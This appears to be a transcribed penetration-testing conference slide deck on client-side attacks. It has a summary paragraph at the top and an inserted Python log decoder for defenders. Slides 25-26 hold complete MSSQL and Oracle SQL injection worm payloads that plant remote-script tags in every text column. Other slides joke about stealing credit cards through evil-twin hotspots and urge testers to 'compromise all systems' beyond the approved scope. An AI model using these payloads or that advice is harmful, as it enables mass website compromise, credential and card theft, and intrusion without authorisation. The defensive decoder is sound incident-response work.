The document discusses various client-side attack techniques, including exploiting Microsoft Office macros and malicious PDF files to execute code on targets' machines. It also covers USB-based attacks, SQL injection worms, and wireless evil twin attacks. The speaker advocates using "black hat" tactics like these during penetration tests to think outside the box and effectively compromise systems. An example operation called "CloudBurst" is described that starts with client-side attacks and pivots to a local kernel exploit and internal pass-the-hash attacks to fully compromise the target network.
1. Tactical Assassins : Client-Side OWNage
Prathan Phongthiproek
ACIS Professional Center
Senior Information Security Consultant
2. Who am I ?!
Instructor / Speaker
Red Team : Penetration Tester (Team Leader)
Security Consultant / Researcher
CWH Underground
Exploits and Vulnerabilities Disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
3. Let’s Talk!
Attack Layer 8: Client-Side OWNage
MS Office (Evil Macro)
Malicious Adobe PDF
Malicious USB
One-Click Attack
Evil-Twin Attack!
Built-in Pen-Test Tactics
Black Hat versus White Hat
Using Black Hat styles to Compromise system
Operation CloudBurst
25. One-Click Attack!
SQL Injection Worms - MSSQL!
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
AS%20NVARCHAR(4000));EXEC(@S);--
26. One-Click Attack!
SQL Injection Worms - Oracle!
http://127.0.0.1:81/ora4.php?name=1 and 1=(select
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
begin execute immediate '''''''' alter session set current_schema=SCOTT '''''''';
execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||
chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||
chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||
chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||
chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||
chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||
chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||
chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||
chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||
chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM
ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME =
C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||
chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||
chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE
IMMEDIATE rec.foo;end loop;execute immediate
''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
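As an added defender-side example, not part of the original slides: a small Python helper for incident responders that URL-decodes a web request line, unwraps the two encodings these worms use (the hex CAST(0x<hex> AS NVARCHAR(4000)) literal that the MSSQL worm carries in the wild and that the slide shows already decoded, and the chr(N)||chr(M) chains of the Oracle worm) and pulls out the injected script URL. The sample requests and the example.invalid host are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Two encodings used by the worm payloads on this page:
#   MSSQL:  CAST(0x<hex> AS NVARCHAR(4000)) hides UTF-16LE SQL that EXEC(@S) runs
#   Oracle: chr(N)||chr(M)||... spells the statement one character at a time
MSSQL_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR\(\d+\)\)", re.I)
ORACLE_CHR = re.compile(r"chr\(\d+\)(?:\s*\|\|\s*chr\(\d+\))*", re.I)
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\"'\s>]+)", re.I)


def decode_mssql_cast(sql):
    """Replace each hex NVARCHAR literal with the UTF-16LE text it encodes."""
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("utf-16-le", errors="replace")
        except ValueError:  # odd-length hex: leave the literal as it is
            return m.group(0)
    return MSSQL_CAST.sub(repl, sql)


def decode_oracle_chr(sql):
    """Collapse every chr(N)||chr(M) chain into the text it spells."""
    def repl(m):
        return "".join(chr(int(c)) for c in re.findall(r"\d+", m.group(0)))
    return ORACLE_CHR.sub(repl, sql)


def analyze_request(raw_line):
    """Classify one URL-encoded request line and surface the injected script URL."""
    sql = unquote(raw_line)
    engine = None
    chr_count = len(re.findall(r"chr\(\d+\)", sql, re.I))
    if MSSQL_CAST.search(sql):
        engine, sql = "mssql", decode_mssql_cast(sql)
    elif "DBMS_EXPORT_EXTENSION" in sql.upper() or chr_count >= 8:
        engine, sql = "oracle", decode_oracle_chr(sql)
    m = SCRIPT_SRC.search(sql)
    return {"engine": engine, "decoded": sql, "script_src": m.group(1) if m else None}


# Constructed sample requests (not from the slides); the script host is a placeholder.
_JS = "http://example.invalid/k.js"
_BODY = f"update t set c=c+'<script src={_JS}></script>'"
SAMPLE_MSSQL = ("/page.asp?id=1';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
                + _BODY.encode("utf-16-le").hex().upper() + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
_TAG = "||".join(f"chr({ord(ch)})" for ch in f'<script src="{_JS}"></script>')
SAMPLE_ORACLE = ("/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
                 f"'FOO','BAR','...update T set C=C||{_TAG}...','SYS',0,'1',0) from dual)--")
```

Run over access logs, the decoded field shows the real UPDATE statement and the script_src field gives the indicator to block or hunt for in stored page content.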
33. Evil-Twin Attack!
Karma + Metasploit = Karmetasploit !!
Rogue Access Point (Evil Twin): steal usernames, passwords and information from public wireless hotspots
Why don't we steal something evil like credit cards (Pay to Play)??
38. Black Hat versus White Hat!
Black Hat: Thinking Outside of the Box
- Knows one piece of information and has to expand from there
- Compromise all systems and target attack
- All methodologies are integrated
- Manual footprinting, no noisy scan, just Nmap and 0-day attack

White Hat: Thinking Inside the Box
- Assigned a limited block of IP addresses
- Unable to go beyond the scope of the approved list: only touch xyz hosts, don't touch abc host
- Follow pen-test methodologies: OSSTMM, NIST, ISSAF
- Download exploits from Milw0rm, exploit with Core Impact, CANVAS, Metasploit

Oops, I cannot hack user.
Attack Layer 8: Client-Side OWNage
39. Using Black Hat styles to Compromise system
Pen-Testers must "think outside of the box"
Attack Layer 8: more effective results
Pen-Test with Black Hat styles
Using the Black Hat mind:
Email address enumeration
Social networking (Maltego)
Social engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc.)
Information gathering: all subdomains (xyz.victim.com, abc.victim.com, 123.victim.com)
Blind test, compromise all systems and target attack
42. KiTrap0d – Local Ring0 Kernel Exploit
MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
Not affected: Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)
Patch released as MS10-015 on Feb 09 2010. Get The Hell Outta Here!!
0-day for 1 month. W00t! W00t!
44. Token Kidnapping – Elevate Privilege
Token - Web Cookies
On Windows XP / 2003, Windows services run as the SYSTEM account
Compromise of a Service == Full System Compromise
On Windows Vista / 2008, LocalService / NetworkService == System
Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
Patch released as MS09-012 on April 14 2009
0-day for 1 year. W00t! W00t!!
Black Hat Mind!!
Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
45. Operation CloudBurst
Start Mission with Attack Layer 8
SPAM Mail / 1-Click Ownage
Reverse Shell to Attacker
KiTrap0d – The Message From Slave to God
0-day Ring0 exploit, all Windows OS
Maintain Access
Pivot (Tunneling), Backdoor Position
Compromise All System and Domain Controller
Impersonate Token, Pass-The-Hash Attack